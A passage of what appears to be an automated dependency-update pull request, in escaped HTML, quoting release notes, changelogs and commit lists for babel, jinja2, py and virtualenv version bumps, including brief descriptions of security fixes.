python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/2.1.1...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `jinja2` from 2.8.0 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.8...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.4.30 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.4.30...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 12.0.2 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca 